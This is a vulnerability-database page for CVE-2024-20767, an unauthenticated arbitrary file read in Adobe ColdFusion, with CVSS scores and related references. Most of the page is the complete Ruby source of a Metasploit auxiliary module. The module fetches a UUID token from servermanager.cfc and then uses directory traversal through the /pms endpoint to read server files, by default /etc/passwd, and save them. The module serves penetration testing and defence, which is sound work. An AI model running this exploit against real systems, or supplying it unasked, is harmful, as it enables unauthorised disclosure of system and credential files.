Lucene search
Ma4ter, yoryio, Christiaan Beek, jheysel-r7MSF:AUXILIARY-GATHER-COLDFUSION_PMS_SERVLET_FILE_READ-HistoryApr 04, 2024 - 12:25 a.m.
CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read
2024-04-0400:25:45
ma4ter, yoryio, Christiaan Beek, jheysel-r7
www.rapid7.com
42
adobe coldfusion
improper access vulnerability
unauthenticated attackers
uuid
/cfide/adminapi/_servermanager/servermanager.cfc
/pms endpoint
arbitrary file read vulnerability
directory traversal
metasploit module
8.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
7.5 High
AI Score
Confidence
Low
0.088 Low
EPSS
Percentile
94.6%
This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version ‘2023 Update 6’ and ‘2021 Update 12’. The vulnerability allows unauthenticated attackers to request authentication token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read',
'Description' => %q{
This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
},
'Author' => [
'ma4ter', # Analysis & Discovery
'yoryio', # PoC
'Christiaan Beek', # Msf module
'jheysel-r7' # Msf module assistance
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-20767'],
['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],
['URL', 'https://jeva.cc/2973.html'],
],
'DisclosureDate' => '2024-03-12',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(8500),
OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),
OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),
OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),
]
)
end
def get_uuid
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),
'vars_get' =>
{
'method' => 'getHeartBeat'
}
})
fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res
# TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.
fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 200
uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text
fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid =~ /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/
uuid
end
def run
print_status('Attempting to retrieve UUID ...')
uuid = get_uuid
print_good("UUID found: #{uuid}")
print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}")
traversal_path = '../' * datastore['DEPTH']
file_path = "#{traversal_path}#{datastore['FILE_PATH']}"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'pms'),
'vars_get' =>
{
'module' => 'logging',
'file_name' => file_path,
'number_of_lines' => datastore['NUMBER_OF_LINES']
},
'headers' =>
{
'uuid' => uuid
}
})
fail_with(Failure::Unknown, 'No response received') unless res
if res.code == 200
print_good('File content received:')
else
fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
end
file_contents = []
res.body[1..-2].split(', ').each do |html_response_line|
print_status(html_response_line)
file_contents << html_response_line
end
stored_path = store_loot('coldfusion.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
print_good("Results saved to: #{stored_path}")
end
end
Related
githubexploit
githubexploit
Exploit for CVE-2024-20767
2024-03-26 10:03:51
Exploit for CVE-2024-20767
2024-03-26 19:17:14
Exploit for CVE-2024-20767
2024-04-01 09:01:30
cvelist
cvelist
nessus
nessus
nvd
nvd
CVE-2024-20767
2024-03-18 12:15:06
adobe
adobe
APSB24-14 : Security update available for Adobe ColdFusion
2024-03-12 00:00:00
cve
cve
CVE-2024-20767
2024-03-18 12:15:06
nuclei
nuclei
Adobe ColdFusion - Arbitrary File Read
2024-03-26 04:03:06
vulnrichment
vulnrichment
rapid7blog
rapid7blog
Metasploit Wrap-Up 05/10/2024
2024-05-10 20:12:01
8.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
7.5 High
AI Score
Confidence
Low
0.088 Low
EPSS
Percentile
94.6%
Related for MSF:AUXILIARY-GATHER-COLDFUSION_PMS_SERVLET_FILE_READ-